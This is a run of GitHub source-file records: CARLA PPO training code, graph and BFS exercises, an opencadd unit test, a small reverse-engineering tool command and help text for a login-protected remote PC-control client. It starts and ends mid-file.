batch.src[1].to(device), \\\n batch.tgt[0].to(device), batch.tgt[1].to(device)\n\n pred = model(sentence, len_sentence, question, len_question)\n\n pred = dress_for_loss(pred)\n\n loss = criterion(pred.view(-1, pred.size(2)), question[:, 1:].contiguous().view(-1))\n\n num_non_padding, num_correct = correct_tokens(pred, question, padding_idx)\n mc.update_metrics(loss.item(), num_non_padding, num_correct)\n\n mc.report_metrics()\n writer.add_scalars(\"valid\", {\"loss\": mc.list_valid_loss[-1],\n \"accuracy\": mc.list_valid_accuracy[-1],\n \"perplexity\": mc.list_valid_perplexity[-1],\n \"epoch\": mc.epoch})\n\n # save last model weights\n save_checkpoint({\n 
\"epoch\": mc.epoch + epoch_checkpoint,\n \"state_dict\": model.state_dict(),\n \"best_valid_loss\": mc.list_valid_loss[-1],\n }, True, os.path.join(experiment_path, \"model_last_checkpoint.pkl\"))\n\n # save model weights with best validation error\n is_best = bool(mc.list_valid_loss[-1] < best_valid_loss)\n best_valid_loss = min(mc.list_valid_loss[-1], best_valid_loss)\n save_checkpoint({\n \"epoch\": mc.epoch + epoch_checkpoint,\n \"state_dict\": model.state_dict(),\n \"best_valid_loss\": best_valid_loss\n }, is_best, os.path.join(experiment_path, \"model.pkl\"))\n\n# export scalar data to TXT file for external processing and analysis\nmc.log_metrics(os.path.join(experiment_path, \"train_log.txt\"))\n","repo_name":"Aleczhang13/learning_to_ask_question","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8030,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"41554245170","text":"from argparse import RawTextHelpFormatter\nfrom fa import utils\n\nDESCRIPTION = '''make the resultset unique\n\nEXAMPLE:\n results = [0, 4, 8, 8, 12]\n -> unique\n result = [0, 4, 8, 12]\n'''\n\n\ndef get_parser():\n p = utils.ArgumentParserNoExit('unique',\n description=DESCRIPTION,\n formatter_class=RawTextHelpFormatter)\n return p\n\n\ndef run(segments, args, addresses, interpreter=None, **kwargs):\n return list(set(addresses))\n","repo_name":"doronz88/fa","sub_path":"fa/commands/unique.py","file_name":"unique.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"78"} +{"seq_id":"15421624100","text":"# 백준 - 실버2 - 알고리즘 수업 너비 우선 탐색 1 - 24444 - 그래프, 정렬, bfs 문제\n'''\n그래프, 정렬, bfs 문제\n\nbfs 풀 듯이 문제를 풀어야 되는데 그래프를 정렬한 뒤 풀어야 된다.\n문제에 나와있듯이 정렬한 뒤에 제출해야 통과한다. 처음에 정렬을 안하고 '틀렸습니다.' 
가 나와서 당황했다.\n'''\n\nfrom collections import deque\nimport sys; input=sys.stdin.readline # Python3 로 제출하려면 필요 \n\nn, m, r = map(int, input().split())\ng = [ [] for _ in range(n + 1) ]\n\nfor _ in range(m):\n a, b = map(int, input().split())\n g[a].append(b)\n g[b].append(a)\n\nfor i in range(n + 1):\n g[i].sort()\n\nck = [0] * (n + 1)\ncnt = 1\n\ndef bfs(x):\n global cnt\n q = deque([x])\n ck[x] = 1\n cnt += 1\n\n while q:\n a = q.popleft()\n\n for i in g[a]:\n if ck[i] == 0:\n ck[i] = cnt\n cnt += 1\n q.append(i)\n\nbfs(r)\nfor i in ck[1:]:\n print(i)","repo_name":"rkdalsdn94/algoalgo","sub_path":"solved_ac/Silver_2/알고리즘_수업_너비_우선_탐색_1_24444.py","file_name":"알고리즘_수업_너비_우선_탐색_1_24444.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4701882639","text":"\"\"\"\nTests for opencadd.structure.pocket.region\n\"\"\"\n\nimport pandas as pd\nimport pytest\n\nfrom opencadd.structure.pocket import Region\n\n\nclass TestRegion:\n \"\"\"\n Test TestRegion class methods.\n \"\"\"\n\n @pytest.mark.parametrize(\n \"name, residue_ids, residue_ixs, color\",\n [(\"example\", [1, 2], [10, 20], \"blue\")],\n )\n def test_attributes_and_properties(self, name, residue_ids, residue_ixs, color):\n region = Region(name, residue_ids, residue_ixs, color)\n assert region.name == name\n assert region.residue_ids == residue_ids\n assert region.residue_ixs == residue_ixs\n assert region.color == color\n assert isinstance(region.region, pd.DataFrame)\n assert region.region.columns.to_list() == [\n \"region.name\",\n \"region.color\",\n \"residue.id\",\n \"residue.ix\",\n ]\n","repo_name":"volkamerlab/opencadd","sub_path":"opencadd/tests/structure/test_pocket_region.py","file_name":"test_pocket_region.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"78"} +{"seq_id":"36736858539","text":"import networkx as nx\r\nimport matplotlib.pyplot as plt\r\nfrom itertools import combinations\r\nimport random\r\nfrom tqdm import tqdm\r\nimport math\r\n\r\n\r\ndef random_combination(iterable, r):\r\n # This function is taken from python itertools documentation - recipes section\r\n \"Random selection from itertools.combinations(iterable, r)\"\r\n pool = tuple(iterable)\r\n n = len(pool)\r\n indices = sorted(random.sample(range(n), r))\r\n return tuple(pool[i] for i in indices)\r\n\r\n\r\ndef lar_and_small_cliq(G):\r\n # This function is already something used in previous assignments\r\n cliq_len = []\r\n max_count = 0\r\n min_count = 0\r\n for cliq in list(nx.find_cliques(G)):\r\n cliq_len.append(len(cliq))\r\n\r\n for i in cliq_len:\r\n if i == max(cliq_len):\r\n max_count += 1\r\n elif i == min(cliq_len):\r\n min_count += 1\r\n\r\n print(\" Largest clique - Size: \",\r\n max(cliq_len), \", Number: \", max_count)\r\n print(\" Smallest clique - Size: \",\r\n min(cliq_len), \", Number: \", min_count)\r\n\r\n\r\ndef generate_many():\r\n print(\"Generating random graphs with different sizes...\")\r\n for i in tqdm(range(100, 100000, 1000)):\r\n G = nx.erdos_renyi_graph(i, 0.5)\r\n degrees = [G.degree(node) for node in G.nodes]\r\n plt.hist(degrees, alpha=0.5)\r\n\r\n print(\"Generating scale-free graphs with different sizes...\")\r\n for i in tqdm(range(100, 100000, 1000)):\r\n G = nx.barabasi_albert_graph(i, i-10)\r\n degrees = [G.degree(node) for node in G.nodes]\r\n plt.hist(degrees, alpha=0.5)\r\n\r\n plt.show()\r\n\r\n\r\ndef generate_NL(n, 
l):\r\n V = set([v for v in range(n)])\r\n E = set()\r\n\r\n while len(E) < l:\r\n E.add(random_combination(V, 2))\r\n\r\n G = nx.Graph()\r\n G.add_nodes_from(V)\r\n G.add_edges_from(E)\r\n\r\n return G\r\n\r\n\r\ndef generate_NP(n, p):\r\n V = set([v for v in range(n)])\r\n E = set()\r\n for combination in combinations(V, 2):\r\n a = random.random()\r\n if a < p:\r\n E.add(combination)\r\n\r\n G = nx.Graph()\r\n G.add_nodes_from(V)\r\n G.add_edges_from(E)\r\n\r\n return G\r\n\r\n\r\ndef analysis(G_rn, G_sf):\r\n\r\n print(\"Random Network\")\r\n print(\" Number of nodes: \", len(G_rn.nodes))\r\n print(\" Number of edges: \", len(G_rn.edges))\r\n print(\" Number of components: \", nx.number_connected_components(G_rn))\r\n\r\n sum_rn = 0\r\n for node in G_rn.nodes:\r\n sum_rn += G_rn.degree(node)\r\n\r\n avg_rn = sum_rn/len(G_rn.nodes)\r\n print(\" Average Degree: \", avg_rn)\r\n\r\n tri_rn = nx.triangles(G_rn)\r\n notri_rn = sum(tri_rn.values())//3\r\n print(\" Number of triangles: \", notri_rn)\r\n\r\n try:\r\n print(\" Diameter: \", nx.diameter(G_rn))\r\n except nx.exception.NetworkXError:\r\n print(\" Diameter: \", float(math.inf))\r\n\r\n print(\" Clustering coefficient: \", nx.average_clustering(G_rn))\r\n lar_and_small_cliq(G_rn)\r\n\r\n print(\"Scale-free network\")\r\n print(\" Number of nodes: \", len(G_sf.nodes))\r\n print(\" Number of edges: \", len(G_sf.edges))\r\n print(\" Number of components: \", nx.number_connected_components(G_sf))\r\n\r\n sum_sf = 0\r\n for node in G_sf.nodes:\r\n sum_sf += G_sf.degree(node)\r\n\r\n avg_sf = sum_sf/len(G_sf.nodes)\r\n print(\" Average Degree: \", avg_sf)\r\n\r\n tri_sf = nx.triangles(G_sf)\r\n notri_sf = sum(tri_sf.values())//3\r\n print(\" Number of triangles: \", notri_sf)\r\n\r\n try:\r\n print(\" Diameter: \", nx.diameter(G_sf))\r\n except nx.exception.NetworkXError:\r\n print(\" Diameter: \", float(math.inf))\r\n\r\n print(\" Clustering coefficient: \", nx.average_clustering(G_sf))\r\n lar_and_small_cliq(G_sf)\r\n\r\n # Degree distribution\r\n degrees_rn = [G_rn.degree(node) for node in G_rn.nodes]\r\n degrees_sf = [G_sf.degree(node) for node in G_sf.nodes]\r\n plt.hist(degrees_rn, alpha=0.5, label='Random')\r\n plt.hist(degrees_sf, alpha=0.5, label='Scale-free')\r\n plt.legend(loc='upper right')\r\n plt.title('Degree distribution')\r\n print()\r\n print(\"Degree distributions plotted\")\r\n plt.show()\r\n\r\n\r\ndef main():\r\n print(\"Generate network from (N, L) or (N, P)\")\r\n print(\"Enter '1' for (N, L) and '2' for (N, P)\")\r\n method = int(input(\"Answer: \"))\r\n\r\n if method == 1:\r\n print(\"======================================================\")\r\n print(\" Random graph with N and L \")\r\n print(\"------------------------------------------------------\")\r\n n = int(input(\"Give number of nodes: \"))\r\n l = int(input(\"Give number of edges: \"))\r\n G = generate_NL(n, l)\r\n print(\"Graph generated with given N and L\")\r\n\r\n elif method == 2:\r\n print(\"======================================================\")\r\n print(\" Random graph with N and P \")\r\n print(\"------------------------------------------------------\")\r\n n = int(input(\"Give number of nodes: \"))\r\n p = float(input(\"Give p: \"))\r\n G = generate_NP(n, p)\r\n print(\"Graph generated with given N and P\")\r\n\r\n print(\"======================================================\")\r\n print(\" Question 3 \")\r\n print(\"------------------------------------------------------\")\r\n G_rn = nx.erdos_renyi_graph(100, 0.5)\r\n G_sf = 
nx.barabasi_albert_graph(100, 90)\r\n analysis(G_rn, G_sf)\r\n\r\n print(\"======================================================\")\r\n print(\" Question 2 \")\r\n print(\"------------------------------------------------------\")\r\n generate_many()\r\n\r\n print(\"======================================================\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"saurabhburewar/Data-and-Networks_SNA","sub_path":"RandomAndScaleFree/B18CSE050_assignment4.py","file_name":"B18CSE050_assignment4.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34509931282","text":"# Code inspired by the minimal PPO implementation of Nikhil Barhate https://github.com/nikhilbarhate99/PPO-PyTorch\n\nimport glob\nimport os\nimport sys\n\ntry:\n sys.path.append(glob.glob('PythonAPI/carla/dist/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept IndexError:\n print(\"could not find the CARLA egg\")\n pass\ntry:\n sys.path.append(glob.glob('../PythonAPI')[0])\n sys.path.append(glob.glob('../bird_view')[0])\n sys.path.append(glob.glob('../')[0])\nexcept IndexError as e:\n pass\nfrom configparser import ConfigParser\nfrom pathlib import Path\n\nimport carla\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom tqdm import tqdm\nimport random\n\nfrom benchmark import make_suite\nfrom bird_view.utils import carla_utils as cu\nfrom training.phase2_utils import setup_image_model\nfrom training.ppo_utils.agent import PPOImageAgent\nfrom training.ppo_utils.critic import BirdViewCritic, BirdViewCritic2, BirdViewCritic3\nfrom training.ppo_utils.replay_buffer import PPOReplayBuffer\nfrom training.ppo_utils.helpers import rtgs, gae, _paint, get_reward\nfrom tensorboardX import SummaryWriter\n\nGAP = 5\nN_STEP = 5\nCROP_SIZE = 192\nMAP_SIZE = 320\nSAVE_EPISODES = list(range(20))\n\n\ndef crop_birdview(birdview, dx=0, dy=0):\n x = 260 - CROP_SIZE // 2 + dx\n y = MAP_SIZE // 2 + dy\n\n birdview = birdview[\n x - CROP_SIZE // 2:x + CROP_SIZE // 2,\n y - CROP_SIZE // 2:y + CROP_SIZE // 2]\n\n return birdview\n\n\ndef one_hot(x, num_digits=4, start=1):\n N = x.size()[0]\n x = x.long()[:, None] - start\n x = torch.clamp(x, 0, num_digits - 1)\n y = torch.FloatTensor(N, num_digits)\n y.zero_()\n y.scatter_(1, x, 1)\n return y\n\n\ndef rollout(replay_buffer, image_agent, critic, episode, total_time_steps, max_rollout_length=4000,\n rollouts_per_episode=5, port=2000,\n planner=\"new\", show=False, include_hero=False, writer=None, **kwargs):\n progress = tqdm(range(max_rollout_length * rollouts_per_episode), desc='Frame')\n data = [[] for _ in range(rollouts_per_episode)]\n\n with make_suite('NoCrashTown01-v1', port=port, planner=planner) as env:\n env.col_threshold = 200\n time_steps = total_time_steps\n for i in range(rollouts_per_episode):\n print(\"Episode\", episode, \", rollout\", i)\n start, target = env.pose_tasks[np.random.randint(len(env.pose_tasks))]\n env_params = {\n 'weather': np.random.choice(list(cu.TRAIN_WEATHERS.keys())),\n 'start': start,\n 'target': target,\n 'n_pedestrians': random.randint(100, 250),\n 'n_vehicles': random.randint(60, 120),\n }\n\n env.init(**env_params)\n env.success_dist = 5.0\n env.tick()\n\n total_rewards = 0\n\n stuck_steps = 0\n while not env.is_success() and not env.collided and \\\n len(data[i]) <= max_rollout_length:\n observations = 
env.get_observations(include_hero=include_hero)\n\n control, action, action_logprobs = image_agent.run_step(observations)\n\n diagnostic = env.apply_control(control)\n env.tick()\n\n rgb_img = observations[\"rgb\"].copy()\n command = int(observations[\"command\"])\n speed = np.linalg.norm(observations[\"velocity\"])\n\n next_waypoint_location = env._next # Get the location of the next waypoint\n player_location = env._player.get_location()\n distance = player_location.distance(next_waypoint_location)\n\n birdview_img = crop_birdview(observations[\"birdview\"], dx=-10)\n state_value = critic.evaluate(*critic.prepare_data(birdview_img, speed, command))\n\n reward, lateral_deviation = get_reward(env, speed, **kwargs)\n is_terminal = env.collided or env.is_failure() or env.is_success()\n\n if speed <= 0.03 and not env._player.is_at_traffic_light():\n stuck_steps += 1\n else:\n stuck_steps = 0\n\n if stuck_steps >= 200:\n print(\"Stopping rollout. Stuck in same place for too long.\")\n is_terminal = True\n if distance > 45:\n print(\"Stopping rollout. Drove too far away from next checkpoint.\")\n is_terminal = True\n if lateral_deviation > 5:\n print(\"Stopping rollout. Lateral deviation to large\")\n is_terminal = True\n if len(data) + 1 >= max_rollout_length:\n print(\"Stopping rollout. Reached max rollout length.\")\n is_terminal = True\n\n if time_steps % 30 == 0:\n env.move_spectator_to_player()\n\n data[i].append({\n 'state': {\n 'rgb_img': rgb_img,\n 'command': command,\n 'speed': speed,\n 'birdview_img': birdview_img,\n 'state_value': state_value\n },\n 'action': action,\n 'action_logprobs': action_logprobs,\n 'reward': reward,\n 'is_terminal': is_terminal\n })\n total_rewards += reward\n progress.update(1)\n time_steps += 1\n if time_steps % image_agent.action_std_decay_frequency == 0:\n image_agent.decay_action_std()\n if show:\n _paint(observations, control, diagnostic, reward, image_agent.action_std, image_agent.debug, env,\n lateral_deviation, distance)\n\n if is_terminal:\n break\n\n print(\"Collided: \", env.collided)\n print(\"Success: \", env.is_success())\n env.clean_up()\n\n if writer is not None:\n writer.add_scalar(\"Rollout reward\", total_rewards, (episode * rollouts_per_episode + i))\n\n env_settings = env._world.get_settings()\n env_settings.no_rendering_mode = True\n env._world.apply_settings(env_settings)\n for rollout_data in data:\n for datum in rollout_data:\n replay_buffer.add_data(**datum)\n return total_rewards, time_steps\n\n\ndef update(log_dir, replay_buffer, image_agent, optimizer, device, episode, critic, critic_criterion,\n epoch_per_episode=5, gamma=0.99, lmbda=0.5, clip_ratio=0.05, c1=1.0, c2=0.01, batch_size=24, num_workers=0,\n critic_writer=None):\n def to_tensor(x):\n return torch.tensor(x, dtype=torch.float32).to(device)\n\n # Retrieve rewards, terminal states and state values from the rollout(s)\n rewards = replay_buffer.get_rewards()\n terminals = replay_buffer.get_is_terminals()\n values = to_tensor(replay_buffer.get_state_values())\n\n # Calculate advantages using generalized advantage estimation (GAE)\n advantages = to_tensor(gae(rewards, terminals, values, gamma=gamma, lmbda=lmbda, normalize=True))\n\n # Calculate rewards-to-go, used later when calculating loss for the critic\n rewards_to_go = to_tensor(rtgs(rewards, terminals, gamma, normalize=True))\n\n loader = torch.utils.data.DataLoader(replay_buffer, batch_size=batch_size, num_workers=num_workers,\n pin_memory=False, shuffle=True, drop_last=True)\n\n # Connecting to server to prevent 
timout\n # client = carla.Client(\"localhost\", 2000)\n # client.set_timeout(30)\n # cu.set_sync_mode(client, False)\n # world = client.load_world(\"town01\")\n print(\"Training on {} examples\".format(len(replay_buffer)))\n for epoch in range(epoch_per_episode):\n # world.wait_for_tick()\n desc = \"Episode {}, epoch {}\".format(episode, epoch)\n running_critic_loss = 0\n for i, (idxes, rgb, speed, command, birdview, old_actions, old_logprobs) in tqdm(enumerate(loader), desc=desc):\n # Unpack old_states into RGB, birdview, speed and command.\n rgb = rgb.to(device).float()\n birdview = birdview.to(device).float()\n speed = speed.to(device).float()\n command = one_hot(command).to(device).float()\n\n # Calculate log probability of old actions on the new policy and retrieve entropy of distribution\n logprobs, dist_entropy = image_agent.evaluate(rgb, speed, command, old_actions)\n\n # Calculate ratio between new and old policy\n ratios = torch.exp(logprobs - old_logprobs)\n\n # Evaluate state values with the critic\n state_values, _ = critic(birdview, speed, command)\n state_values = state_values.squeeze()\n\n # PPO objective function\n surr1 = ratios * advantages[idxes]\n surr2 = torch.clamp(ratios, 1 - clip_ratio, 1 + clip_ratio) * advantages[idxes]\n objective = torch.min(surr1, surr2)\n\n # Critic loss\n critic_loss = critic_criterion(state_values, rewards_to_go[idxes])\n\n # Compute loss\n loss = - objective + c1 * critic_loss - c2 * dist_entropy\n\n # Take gradient step\n optimizer.zero_grad()\n loss.mean().backward()\n optimizer.step()\n\n # Running loss for critic\n running_critic_loss += critic_loss.item() * rgb.size(0)\n\n epoch_critic_loss = running_critic_loss / len(replay_buffer)\n if critic_writer is not None:\n if episode == 0:\n epoch_write_number = epoch\n else:\n epoch_write_number = epoch_per_episode * episode + epoch\n critic_writer.add_scalar(\"Critic loss\", epoch_critic_loss, epoch_write_number)\n # cu.set_sync_mode(client, False)\n\n # Set the new policy as the old policy\n image_agent.policy_old.load_state_dict(image_agent.model.state_dict())\n\n # Save models\n torch.save(image_agent.model.state_dict(), str(Path(log_dir) / ('actor-%d.th' % episode)))\n torch.save(critic.state_dict(), str(Path(log_dir) / ('critic-%d.th' % episode)))\n\n\ndef main():\n config = ConfigParser()\n config.read(\"training/ppo_config/template.cfg\")\n\n # SETUP\n log_dir = str(config[\"SETUP\"][\"log_dir\"])\n port = int(config[\"SETUP\"][\"port\"])\n device = str(config[\"SETUP\"][\"device\"])\n batch_size = int(config[\"SETUP\"][\"batch_size\"])\n num_workers = int(config[\"SETUP\"][\"num_workers\"])\n resume_episode = int(config[\"SETUP\"][\"resume_episode\"])\n computer_vision = str(config[\"SETUP\"][\"computer_vision\"])\n show = str(config[\"SETUP\"][\"show\"]) == \"True\"\n\n # TRAINING (Hyperparameters)\n max_episode = int(config[\"TRAINING\"][\"max_episode\"])\n max_rollout_length = int(config[\"TRAINING\"][\"max_rollout_length\"])\n rollouts_per_episode = int(config[\"TRAINING\"][\"rollouts_per_episode\"])\n epoch_per_episode = int(config[\"TRAINING\"][\"epoch_per_episode\"])\n clip_ratio = float(config[\"TRAINING\"][\"clip_ratio\"])\n gamma = float(config[\"TRAINING\"][\"gamma\"])\n lmbda = float(config[\"TRAINING\"][\"lambda\"])\n c1 = float(config[\"TRAINING\"][\"c1\"])\n c2 = float(config[\"TRAINING\"][\"c2\"])\n\n # REWARD\n alpha = float(config[\"REWARD\"][\"alpha\"])\n beta = float(config[\"REWARD\"][\"beta\"])\n phi = float(config[\"REWARD\"][\"phi\"])\n delta = 
float(config[\"REWARD\"][\"delta\"])\n\n # AGENT\n action_std = float(config[\"AGENT\"][\"action_std\"])\n min_action_std = float(config[\"AGENT\"][\"min_action_std\"])\n action_std_decay_rate = float(config[\"AGENT\"][\"decay_rate\"])\n action_std_decay_frequency = float(config[\"AGENT\"][\"decay_frequency\"])\n\n # ACTOR\n actor_ckpt = str(config[\"ACTOR\"][\"actor_ckpt\"])\n actor_lr = float(config[\"ACTOR\"][\"learning_rate\"])\n actor_imagenet_pretrained = str(config[\"ACTOR\"][\"imagenet_pretrained\"]) == True\n actor_backbone = str(config[\"ACTOR\"][\"backbone\"])\n\n # CRITIC\n critic_ckpt = str(config[\"CRITIC\"][\"critic_ckpt\"])\n critic_lr = float(config[\"CRITIC\"][\"learning_rate\"])\n critic_backbone = str(config[\"CRITIC\"][\"backbone\"])\n include_hero = str(config[\"CRITIC\"][\"include_hero\"]) == \"True\"\n\n # Check if everything is legal\n assert computer_vision in {\"None\", \"gt\",\n \"trained\"}, \"'computer_vision' must be equal to 'None','gt'(ground truth) or 'trained',\" \\\n \" found '{}'\".format(computer_vision)\n assert computer_vision != \"gt\" and computer_vision != \"trained\", \"Not implemented yet lol\"\n\n total_time_steps = 0\n if resume_episode > 0:\n actor_ckpt = Path(log_dir) / ('actor-%d.th' % (resume_episode))\n critic_ckpt = Path(log_dir) / ('critic-%d.th' % (resume_episode))\n action_std = torch.load(Path(log_dir) / \"action_std{}\".format(resume_episode))\n total_time_steps = torch.load(Path(log_dir) / \"time_steps{}\".format(resume_episode))\n resume_episode += 1\n\n # INITIALIZING\n path = Path(log_dir)\n path.mkdir(parents=True, exist_ok=resume_episode > 0)\n\n replay_buffer = PPOReplayBuffer()\n reward_params = {'alpha': alpha, 'beta': beta, 'phi': phi, 'delta': delta}\n\n # Setup actor networks\n actor_net = setup_image_model(backbone=actor_backbone, image_ckpt=actor_ckpt, device=device,\n imagenet_pretrained=actor_imagenet_pretrained, all_branch=True)\n actor_net_old = setup_image_model(backbone=actor_backbone, image_ckpt=actor_ckpt, device=device,\n imagenet_pretrained=actor_imagenet_pretrained)\n # Setup agent\n image_agent_kwargs = {\n 'camera_args': {'w': 384, 'h': 160, 'fov': 90, 'world_y': 1.4, 'fixed_offset': 4.0}}\n\n image_agent = PPOImageAgent(model=actor_net, policy_old=actor_net_old, action_std=action_std,\n min_action_std=min_action_std, action_std_decay_rate=action_std_decay_rate,\n action_std_decay_frequency=action_std_decay_frequency,\n ** image_agent_kwargs)\n\n # TODO: Store Agent args\n\n # Setup critic network and criterion\n critic_net = BirdViewCritic3(backbone=critic_backbone, device=device, all_branch=True, input_channel=8).to(device)\n if critic_ckpt:\n critic_net.load_state_dict(torch.load(critic_ckpt))\n critic_criterion = nn.MSELoss()\n\n # Setup optimizers\n optimizer = torch.optim.Adam([{'params': actor_net.parameters(), 'lr': actor_lr},\n {'params': critic_net.parameters(), 'lr': critic_lr}])\n\n # Setup writers for tensorboard\n critic_writer = SummaryWriter(path / \"logs/critic\")\n reward_writer = SummaryWriter(path / \"logs/reward\")\n\n \"\"\"\n ======================\n MAIN PPO LOOP \n ======================\n \"\"\"\n for episode in range(resume_episode, max_episode):\n episode_rewards = 0\n rewards, total_time_steps = rollout(replay_buffer, image_agent, critic_net, episode, total_time_steps,\n max_rollout_length,\n rollouts_per_episode=rollouts_per_episode, port=port, show=show,\n include_hero=include_hero, writer=reward_writer,\n **reward_params)\n\n torch.save(total_time_steps, path / 
\"time_steps{}\".format(episode))\n torch.save(image_agent.action_std, path / \"action_std{}\".format(episode))\n print(\"Total time steps: {}\".format(total_time_steps))\n\n episode_rewards += rewards\n reward_writer.add_scalar(\"Average rollout rewards\", episode_rewards / rollouts_per_episode, episode)\n update(log_dir, replay_buffer, image_agent, optimizer, device, episode, critic_net, critic_criterion,\n epoch_per_episode, gamma=gamma, lmbda=lmbda, clip_ratio=clip_ratio, batch_size=batch_size,\n num_workers=num_workers, c1=c1, c2=c2, critic_writer=critic_writer)\n replay_buffer.clear_buffer()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jostl/masters-thesis","sub_path":"training/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":16279,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"30011304402","text":"number = int(input())\n\na = number // 100\nb = (number % 100) // 10\nc = number % 10\n\nn = a + b\nm = a + c\nfor _ in range(n):\n for _ in range(m):\n if number % 5 == 0:\n number -= a\n elif number % 3 == 0:\n number -= b\n else:\n number += c\n print(number, end=\" \")\n print()\n","repo_name":"yavor-gornalov/softuni_python_book","sub_path":"07_complex_loops_exam_problems/digits.py","file_name":"digits.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74697544891","text":"# Algoritmo de Fibonacci\n# Este algoritmo gera a sequência de Fibonacci até um determinado número.\n\n\ndef fibonacci(n):\n sequencia = [0, 1]\n\n while sequencia[-1] < n:\n proximo = sequencia[-1] + sequencia[-2]\n sequencia.append(proximo)\n\n return sequencia\n\n\n# Exemplo de uso:\nlimite = 100\nsequencia_fibonacci = fibonacci(limite)\nprint(sequencia_fibonacci)\n","repo_name":"Wxskley/Python","sub_path":"ChatGPT/Dia 11/Exercícios Difíceis/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43544772411","text":"# Explanation on all requests from the server\nall_actions_type_help = [\n {\n \"name\": \"connect\",\n \"description\": \"Connect the user\",\n \"format\": \"connect: <user-name> <password>\",\n \"example\": \"connect: myUserName 123123\",\n \"notes\": \"user must to be register\",\n \"alternative\": \"login\"\n },\n {\n \"name\": \"login\",\n \"description\": \"Login the user\",\n \"format\": \"login: <user-name> <password>\",\n \"example\": \"login: myUserName 123123\",\n \"notes\": \"user must to be register\",\n \"alternative\": \"connect\"\n },\n {\n \"name\": \"register\",\n \"description\": \"Register user\",\n \"format\": \"register: <user-name> <password>\",\n \"example\": \"register: myUserName 123123\",\n \"notes\": None,\n \"alternative\": \"signup\"\n },\n {\n \"name\": \"signup\",\n \"description\": \"Signup user\",\n \"format\": \"signup: <user-name> <password>\",\n \"example\": \"signup: myUserName 123123\",\n \"notes\": None,\n \"alternative\": \"register\"\n },\n {\n \"name\": \"time\",\n \"description\": \"Get current time\",\n \"format\": \"time\",\n \"example\": \"time\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"name\",\n \"description\": \"Get the name of the computer\",\n \"format\": \"name\",\n \"example\": \"name\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": 
\"exit\",\n \"description\": \"Exit from the connections\",\n \"format\": \"exit\",\n \"example\": \"exit\",\n \"notes\": \"It will close the program\",\n \"alternative\": None\n },\n {\n \"name\": \"screenshot\",\n \"description\": \"Take screenshot of the server screen and save it in the server name folder in the client\",\n \"format\": \"screenshot\",\n \"example\": \"screenshot\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"run program\",\n \"description\": \"Run program by path\",\n \"format\": \"run program: <program path>\",\n \"example\": \"run program: C:\\\\Program.exe\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"get folder\",\n \"description\": \"Get Folder content (files and folder) in the server\",\n \"format\": \"get folder: <path>\",\n \"example\": \"get folder: C:\\\\\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"file content\",\n \"description\": \"Get File content in the server\",\n \"format\": \"file content: <file url>\",\n \"example\": \"file content: C:\\\\demo.txt\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"stop keep alive\",\n \"description\": \"Stop keep alive messages\",\n \"format\": \"stop keep alive\",\n \"example\": \"stop keep alive\",\n \"notes\": \"The Server connection will expire after 10 seconds\",\n \"alternative\": \"stop heartbeat\"\n },\n {\n \"name\": \"stop heartbeat\",\n \"description\": \"Stop heartbeat messages\",\n \"format\": \"stop heartbeat\",\n \"example\": \"stop heartbeat\",\n \"notes\": \"The Server connection will expire after 10 seconds\",\n \"alternative\": \"stop keep alive\"\n },\n]\n\n\ndef get_complete_help_message():\n \"\"\"\n Generate complete help message\n :return: complete help message on all the actions\n \"\"\"\n print_str = '--------------------'\n\n for action in all_actions_type_help:\n print_str += '\\n{}:\\n\\t' \\\n 'Description: {}\\n\\t' \\\n 'Format: {}\\n\\t' \\\n 'Example: {}' \\\n .format(action['name'],\n action['description'],\n action['format'],\n action['example'])\n\n if action['notes'] is not None:\n print_str += '\\n\\tNotes: {}'.format(action['notes'])\n\n if action['alternative'] is not None:\n print_str += '\\n\\tAlternative: {}'.format(action['alternative'])\n\n print_str += '\\n'\n\n return print_str\n\n\ncomplete_help_message = get_complete_help_message()\n\n\n# User Action Type\nclass UserActionType:\n\n def __init__(self, handler):\n self.handler = handler\n\n # User Action Types\n self.UserActionTypes = {\n \"name\": self.handler.server_name_handler,\n \"exit\": self.handler.exit_handler,\n \"screenshot\": self.handler.screenshot_handler,\n \"stop keep alive\": self.handler.stop_heartbeat,\n \"stop heartbeat\": self.handler.stop_heartbeat,\n }\n\n # Get Function based on action type, if no command then None\n def get_action_fn(self, command):\n if command not in self.UserActionTypes:\n return {}\n return {\n 'fn': self.UserActionTypes[command]\n }\n","repo_name":"rluvaton/small-pc-control","sub_path":"client/userActionType.py","file_name":"userActionType.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2667548679","text":"from PyQt5.QtWidgets import *\r\nfrom PyQt5.QtCore import *\r\nclass 